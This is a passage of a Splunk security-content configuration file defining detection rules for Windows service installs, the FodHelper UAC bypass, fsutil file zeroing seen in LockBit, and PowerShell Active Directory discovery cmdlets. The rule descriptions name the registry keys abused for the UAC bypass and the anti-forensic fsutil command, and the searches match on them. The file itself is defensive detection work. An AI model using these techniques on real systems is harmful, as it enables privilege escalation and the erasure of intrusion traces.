This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached. action.escu.how_to_implement = While this search does not require you to adhere to Splunk CIM, you must be ingesting your Windows system event logs in order for this search to execute successfully. You should run the baseline search `Previously Seen Running Windows Services - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Running Windows Services - Update` to keep this table up to date and to age out old Windows Services. Please update the `previously_seen_windows_services_window` macro to adjust the time window. Please ensure that the Splunk Add-on for Microsoft Windows is version 8.0.0 or above. action.escu.known_false_positives = A previously unseen service is not necessarily malicious. Verify that the service is legitimate and that was installed by a legitimate process. 
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - First Time Seen Running Windows Service - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Windows Service Abuse", "Orangeworm Attack Group", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - First Time Seen Running Windows Service - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "Orangeworm Attack Group", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_system` EventCode=7036 | rex field=Message "The (?<service>[-\(\)\s\w]+) service entered the (?<state>\w+) state" | where state="running" | lookup previously_seen_running_windows_services service as service OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), `previously_seen_windows_services_window`) | table _time dest service | `first_time_seen_running_windows_service_filter`

[ESCU - FodHelper UAC Bypass - Rule]
action.escu = 0
action.escu.enabled = 1
description = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution that do not exist. An attacker can therefore write malicious commands into these registry keys, which fodhelper.exe then executes with the highest privilege. \
1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\
Upon triage, fodhelper.exe will have a child process, and read access to the registry keys will occur. Isolate the endpoint and review parallel processes for additional behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1548.002", "T1548"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution that do not exist. An attacker can therefore write malicious commands into these registry keys, which fodhelper.exe then executes with the highest privilege. \
1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\
Upon triage, fodhelper.exe will have a child process, and read access to the registry keys will occur. Isolate the endpoint and review parallel processes for additional behavior.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited to no false positives are expected.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - FodHelper UAC Bypass - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "IcedID"]
action.risk = 1
action.risk.param._risk_message = Suspicious registry keys added by process fodhelper.exe (process_id $process_id$), with a parent process of $parent_process_name$, executed on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - FodHelper UAC Bypass - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1548.002", "T1548"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution that do not exist. An attacker can therefore write malicious commands into these registry keys, which fodhelper.exe then executes with the highest privilege. \
1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\
1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\
Upon triage, fodhelper.exe will have a child process, and read access to the registry keys will occur. Isolate the endpoint and review parallel processes for additional behavior.
action.notable.param.rule_title = FodHelper UAC Bypass
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=fodhelper.exe by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `fodhelper_uac_bypass_filter`

[ESCU - Fsutil Zeroing File - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious fsutil process zeroing out a target file. This technique was seen in LockBit ransomware, which zeroes out its own malware path as part of its defense evasion after encrypting the compromised host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious fsutil process zeroing out a target file. This technique was seen in LockBit ransomware, which zeroes out its own malware path as part of its defense evasion after encrypting the compromised host.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-08-11
action.escu.modification_date = 2021-08-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Fsutil Zeroing File - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "LockBit Ransomware"]
action.risk = 1
action.risk.param._risk_message = Possible file data deletion on $dest$ using $process$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Fsutil Zeroing File - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious fsutil process zeroing out a target file. This technique was seen in LockBit ransomware, which zeroes out its own malware path as part of its defense evasion after encrypting the compromised host.
action.notable.param.rule_title = Fsutil Zeroing File
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe Processes.process="*setzerodata*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `fsutil_zeroing_file_filter`

[ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` running the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` running the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-26
action.escu.modification_date = 2021-08-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADDefaultDomainPasswordPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_addefaultdomainpasswordpolicy_with_powershell_filter`

[ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the `powershell` macro as needed to match the sourcetype or add the index. This analytic is specific to EventCode 4104, PowerShell Script Block Logging.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText="*Get-ADDefaultDomainPasswordPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_addefaultdomainpasswordpolicy_with_powershell_script_block_filter`

[ESCU - Get ADUser with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. The `Get-ADUser` cmdlet returns a list of all domain users. Red Teams and adversaries alike may use this cmdlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. The `Get-ADUser` cmdlet returns a list of all domain users. Red Teams and adversaries alike may use this cmdlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADUser with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADUser with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUser*" AND Processes.process = "*-filter*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduser_with_powershell_filter`

[ESCU - Get ADUser with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` cmdlet. The `Get-ADUser` cmdlet is used to return a list of all domain users. Red Teams and adversaries may leverage this cmdlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` cmdlet. The `Get-ADUser` cmdlet is used to return a list of all domain users. Red Teams and adversaries may leverage this cmdlet to enumerate domain users for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the `powershell` macro as needed to match the sourcetype or add the index. This analytic is specific to EventCode 4104, PowerShell Script Block Logging.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADUser with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADUser with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*get-aduser*" ScriptBlockText = "*-filter*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduser_with_powershell_script_block_filter`

[ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` running the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` running the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = An instance of process $process_name$ with command line $process$ on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` running the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = Get ADUserResultantPasswordPolicy with Powershell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUserResultantPasswordPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduserresultantpasswordpolicy_with_powershell_filter`

[ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the `powershell` macro as needed to match the sourcetype or add the index. This analytic is specific to EventCode 4104, PowerShell Script Block Logging.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = PowerShell process with a command line querying the domain user password policy detected on host $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = Get ADUserResultantPasswordPolicy with Powershell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText="*Get-ADUserResultantPasswordPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduserresultantpasswordpolicy_with_powershell_script_block_filter`

[ESCU - Get DomainPolicy with Powershell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` running the `Get-DomainPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` running the `Get-DomainPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-26
action.escu.modification_date = 2021-08-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get DomainPolicy with Powershell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = An instance of process $process_name$ with command line $process$ on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get DomainPolicy with Powershell - Rule
